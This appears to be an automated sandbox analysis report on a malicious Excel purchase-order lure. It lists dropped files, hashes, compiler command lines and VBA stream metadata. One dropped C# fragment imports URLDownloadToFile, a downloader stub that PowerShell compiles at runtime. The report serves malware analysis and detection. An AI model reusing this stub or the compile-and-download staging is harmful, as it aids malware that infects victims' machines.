                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):3.126086307453168
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFak7YnqqpPN5Dlq5J:+RI+ycuZhNHakSpPNnqX
                                                                                            MD5:4F993638AAE51B2D5B8F55A31C6FA0B7
                                                                                            SHA1:BB267F36AEEA40DD3EB060A6BF14DD809B273ADC
                                                                                            SHA-256:4EA249812A5D24704F8BCB2A2765B35291A36DE459CE6B6F8409ACE4BFFD81B6
                                                                                            SHA-512:EB9FE09A0E148A39F1AA1B4F708572E53ED1CC81F65720151D22FC2A87F94765D6B33CCA49C302C1C66929FC4504572417B261686C25D6977B0C49D886A7D852
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 10 05:57:54 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1328
                                                                                            Entropy (8bit):3.997481387851723
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:H0e9EurA619dHSwKdNWI+ycuZhNxakS/PNnqSqd:BrvrJKd41ulxa3dqSK
                                                                                            MD5:9EE959071671AA650AACD35C09DDDF02
                                                                                            SHA1:DB2E18D7F67DC6DD2455906FB9CE3C04D7E4FC69
                                                                                            SHA-256:B61FE550AC969F3A56C1738C2B534DC884E5D1DCDBF1F8BFC0749E0E9FE5601B
                                                                                            SHA-512:092661C928BC9AA3EAD99AD3F1E74BF3ECC270CC312683720A5B517DC790B7A9298702BF7486470B723A57D0012C28213267D885F4AAC8E7F0EB83E07787AEF6
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Dec 10 05:58:20 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1328
                                                                                            Entropy (8bit):4.012538177294539
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:Hee9EuriqQ21dHxwKdNWI+ycuZhNHakSpPNnqSqd:LriqQg6Kd41ulHa3LqSK
                                                                                            MD5:AD01DC4BE073F83E1292A1149032E011
                                                                                            SHA1:D81B6A804B171F0B335DF1511436282735FA9937
                                                                                            SHA-256:ED116126F06A6BAC44D9BC2C03A10010FE1BF1684003955C4AFA67EA517D98D8
                                                                                            SHA-512:572F4B116AF2944152C7976265D2ABC7F1E88634ED5C3D1098AF5487862ED0CA2B87777CBA8B7653E285C1AE0A537EA01848AA80CDEE1A3BA11E4CD8242A433B
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):3.121947616939961
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0Gak7Ynqq/XPN5Dlq5J:+RI+ycuZhNxakS/PNnqX
                                                                                            MD5:BB8363785B8D1B9EFBBB669B2FCC7B6A
                                                                                            SHA1:ED7A05C87C696E7BE9455CC620A7259AAC455594
                                                                                            SHA-256:38C8A69F9DA7F8C5AF0FCCEF508265125D5B41DFA0D1B545EEF7767E0F9D4830
                                                                                            SHA-512:33013BDCCFDCC08CDE23CB6E2ECC823451AFB33672CF27AA44AC97EF68F0AD3B785C4B7CF0BBB8DAEE57708E3E9FF4E7D796D7D77E3E03ACBB6DC925B1C88537
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
                                                                                            Category:dropped
                                                                                            Size (bytes):482
                                                                                            Entropy (8bit):3.72494092078817
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:V/DsYLDS81zusXXemMGtpjQXReKJ8SRHy4HHlkbZ/vNy:V/DTLDfurbXfHO3Ny
                                                                                            MD5:8C16810A9A149EE7B288951C6AFDFCD1
                                                                                            SHA1:4322374E8321E8A97AB6AF0B6A23BB3F016C9713
                                                                                            SHA-256:95C610A9E86321D9DEA63594D0D9C9CB72C5DC56EDF8F78F25736A76CAC0D949
                                                                                            SHA-512:0E37863619591FDD2CDE0AE8EAD71EF856695E299E9BB76266F1B40588D3F7E26521F7CB0BEDCFA2A0809224DC02B076D4A07A1D247B23ADB30E79CA5F626564
                                                                                            Malicious:false
                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace LUtJBV.{. public class gNw. {. [DllImport("urlMOn.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr leaFQHyg,string Txt,string lMM,uint eMnvlHQop,IntPtr kfbeumR);.. }..}.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):369
                                                                                            Entropy (8bit):5.295153068893179
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fGwVH0zxs7+AEszIP23fGwdBH:p37Lvkmb6KzWWZEozH
                                                                                            MD5:CE57452914714FE7C76825C68DD2B377
                                                                                            SHA1:AAFE4AF00DA27D54DD4E386F85E90CD178D06441
                                                                                            SHA-256:E80C693E52BD9B4B0B2D64C05B6F25A1455FDF27EDB9524A03149AC869FAB607
                                                                                            SHA-512:601D8F46B67E2813AB1C7CD1304AE5FB420A476D172EFCA236276C3F2B4E05C164A00BD96122CD74688CDC2684D530E32D8F29A4BAB63FCB2D36278F8960F6AB
                                                                                            Malicious:true
                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.0.cs"
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3072
                                                                                            Entropy (8bit):2.823926434739326
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:etGSaPBG5eM7p8y7MfukhCa0vnk1b+PtkZfGfm2sqhkWI+ycuZhNxakS/PNnq:65sM+lfFCvkt+uJem2sEH1ulxa3dq
                                                                                            MD5:953ACA400D9D54282F064E73D538C25A
                                                                                            SHA1:274EDDAACCF3C75CBE1FC9F45630182D73493F45
                                                                                            SHA-256:A4BCA56A70DBA80AF51F2F2AA074B6FC0646FDC87714BB8E63B302F13889FDF9
                                                                                            SHA-512:EA0AA267B22E0FE921BE02B66431DEB6B7298020243B0806DAF2B0D0306482AE8A337409A0711C16E039BEBE0A82D13E81EDA2C7E75FB81E3692F2131E8D2581
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):866
                                                                                            Entropy (8bit):5.34840940228634
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AId3ka6KznEoqKaMD5DqBVKVrdFAMBJTH:Akka60nEoqKdDcVKdBJj
                                                                                            MD5:2FE5DE7558C228A1D2C6D30048326E51
                                                                                            SHA1:B7FC3DE9DB911FD23C9C5A01FF863B786E05AB5B
                                                                                            SHA-256:C6B43AD6A02CEDEAC8291CF7A0D20F5A0484F48EDF551168B4FA10D181D62204
                                                                                            SHA-512:0DAD2844820653E8DA95A8CFC5F9BF6D01D4FF12C8B8578857B290166C0BB12310EF4D79DDDFF7F4CC9834BFBEFD235CBEC0ADA93C0F09D6B0FA51FF294B86ED
                                                                                            Malicious:false
                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):53248
                                                                                            Entropy (8bit):5.665705943306328
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:BbIdJrxBERqy4PnnjkUqXelNChvpiByN/6KuUuL:BkJrxiqtvn2XuURvEKuUuL
                                                                                            MD5:6BE7E873848441C0A732BD8ADF59CAC6
                                                                                            SHA1:1AB670584DBDCF873DC62FE68232BACF7E35C3C2
                                                                                            SHA-256:1D9413277F9DB7DC64BAD66A4D40ED68CC96D959DE229261B12B46D6BFC025D8
                                                                                            SHA-512:24A8CEC61E6D5DE2FAECF7075C701AA530D02723DEDDDB0FAAD3A0690BADF280CA20CD86DF8593674969F74C31F5BC7F5FBBA84A81D516CEB90A5730C562E282
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):10240
                                                                                            Entropy (8bit):0.6739662216458647
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                                            MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                                            SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                                            SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                                            SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):24152
                                                                                            Entropy (8bit):0.7532185028349225
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35
                                                                                            MD5:520FE964934AF1AB0CEBA2366830D0FA
                                                                                            SHA1:B90310ACA870261CB619FDFD1E54E1B1A25074FF
                                                                                            SHA-256:DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1
                                                                                            SHA-512:A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):153952
                                                                                            Entropy (8bit):3.8067197460998417
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
                                                                                            MD5:5CE00A79A9F41D260446BFDCC6267ADF
                                                                                            SHA1:0B2B90BEB56C59916B98004B1444698538729822
                                                                                            SHA-256:EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
                                                                                            SHA-512:D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
                                                                                            Malicious:true
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:58:03 2024, Security: 1
                                                                                            Category:dropped
                                                                                            Size (bytes):1062912
                                                                                            Entropy (8bit):7.778659222828756
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:4tmzHJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jJEPzcxyL+3hgLFM6xfU:pBambARM8FA8Z+jEd+RwFxf/XA+e
                                                                                            MD5:126A9BFB7B5465383C132D824FC2DA1D
                                                                                            SHA1:73BA715B840B6992917B3EB69BAB0B847FD5DC7C
                                                                                            SHA-256:5B0C550D298018EC9EF24FBE853FEA2D6354712BE5663D89EBD43A782E8F046C
                                                                                            SHA-512:DC68D854D7148035C4B934D6BF6665C83A27445A0CE3C3101B35ACF2E17FE70E211D20652BC066B72A070C58B3646AC3CFF1774D241AE952D0FDD9575DEDED3A
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:false
                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Dec 10 05:58:03 2024, Security: 1
                                                                                            Category:dropped
                                                                                            Size (bytes):1062912
                                                                                            Entropy (8bit):7.778659222828756
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:4tmzHJEUiOIBUzMTSvD3DERnLRmF8DmEPmxpsAQx1Zj+jJEPzcxyL+3hgLFM6xfU:pBambARM8FA8Z+jEd+RwFxf/XA+e
                                                                                            MD5:126A9BFB7B5465383C132D824FC2DA1D
                                                                                            SHA1:73BA715B840B6992917B3EB69BAB0B847FD5DC7C
                                                                                            SHA-256:5B0C550D298018EC9EF24FBE853FEA2D6354712BE5663D89EBD43A782E8F046C
                                                                                            SHA-512:DC68D854D7148035C4B934D6BF6665C83A27445A0CE3C3101B35ACF2E17FE70E211D20652BC066B72A070C58B3646AC3CFF1774D241AE952D0FDD9575DEDED3A
                                                                                            Malicious:true
                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 9 08:36:57 2024, Security: 1
                                                                                            Entropy (8bit):7.761951497204573
                                                                                            TrID:
                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                            File name:Orden_de_Compra_Nmero_6782929219.xls
                                                                                            File size:1'071'616 bytes
                                                                                            MD5:02312414e969b79f88ffde0b68090227
                                                                                            SHA1:aab17d76b523a0a1c79391468885ab855a6f2196
                                                                                            SHA256:8ca816015c1a43fa8cfe732759ba029e176f94e372176ccb8940d91cfc6a7984
                                                                                            SHA512:e88770bb146e0c0eb5ef4c5996ba03595daecc88e13161b8cddebcb703bd5741b08b79efed60f57f9b557b9e8fa84b51cbce56599fb3c98d70eed9ca98561228
                                                                                            SSDEEP:12288:OhmzHJEUiOIBUzMTS+D3DERnLRmF8DKEP3xpsAQx1Zj+j5EP0HtKSsiwfYIt0sZm:rBaXbARM8J38Z+j0EZFwpK6/OYrW
                                                                                            TLSH:603501D1B78DAB02DA55063535F387AE1725AC53E94242BB32F8771E2AF7AD08503F42
                                                                                            Icon Hash:276ea3a6a6b7bfbf
                                                                                            Document Type:OLE
                                                                                            Number of OLE Files:1
                                                                                            Has Summary Info:
                                                                                            Application Name:Microsoft Excel
                                                                                            Encrypted Document:True
                                                                                            Contains Word Document Stream:False
                                                                                            Contains Workbook/Book Stream:True
                                                                                            Contains PowerPoint Document Stream:False
                                                                                            Contains Visio Document Stream:False
                                                                                            Contains ObjectPool Stream:False
                                                                                            Flash Objects Count:0
                                                                                            Contains VBA Macros:True
                                                                                            Code Page:1252
                                                                                            Author:
                                                                                            Last Saved By:
                                                                                            Create Time:2006-09-16 00:00:00
                                                                                            Last Saved Time:2024-12-09 08:36:57
                                                                                            Creating Application:Microsoft Excel
                                                                                            Security:1
                                                                                            Document Code Page:1252
                                                                                            Thumbnail Scaling Desired:False
                                                                                            Contains Dirty Links:False
                                                                                            Shared Document:False
                                                                                            Changed Hyperlinks:False
                                                                                            Application Version:786432
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                            VBA File Name:Sheet1.cls
                                                                                            Stream Size:977
                                                                                            Attribute VB_Name = "Sheet1"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                            VBA File Name:Sheet2.cls
                                                                                            Stream Size:977
                                                                                            Attribute VB_Name = "Sheet2"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:MBD00068A0F/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                            Stream Size:985
                                                                                            Attribute VB_Name = "ThisWorkbook"
                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                            VBA File Name:Sheet1.cls
                                                                                            Stream Size:977
                                                                                            Attribute VB_Name = "Sheet1"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                            VBA File Name:Sheet2.cls
                                                                                            Stream Size:977
                                                                                            Attribute VB_Name = "Sheet2"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                            VBA File Name:Sheet3.cls
                                                                                            Stream Size:977
                                                                                            Attribute VB_Name = "Sheet3"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                            Stream Size:985
                                                                                            Attribute VB_Name = "ThisWorkbook"
                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            General
                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:244
                                                                                            Entropy:2.889430592781307
                                                                                            Base64 Encoded:False
                                                                                            General
                                                                                            Stream Path:\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:200
                                                                                            Entropy:3.3020681057018666
                                                                                            Base64 Encoded:False
                                                                                            General
                                                                                            Stream Path:MBD00068A0E/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:94
                                                                                            Entropy:4.345966460061678
                                                                                            Base64 Encoded:False
                                                                                            General
                                                                                            Stream Path:MBD00068A0E/\x1Ole
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:20
                                                                                            Entropy:0.5689955935892812
                                                                                            Base64 Encoded:False
                                                                                            General
                                                                                            Stream Path:MBD00068A0E/CONTENTS
                                                                                            CLSID:
                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                            Stream Size:29526
                                                                                            Entropy:7.810444862277873
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / C r o p B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:244
                                                                                            Entropy:2.701136490257069
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                            General
                                                                                            Stream Path:MBD00068A0F/\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:220
                                                                                            Entropy:3.372234242231489
                                                                                            Base64 Encoded:False
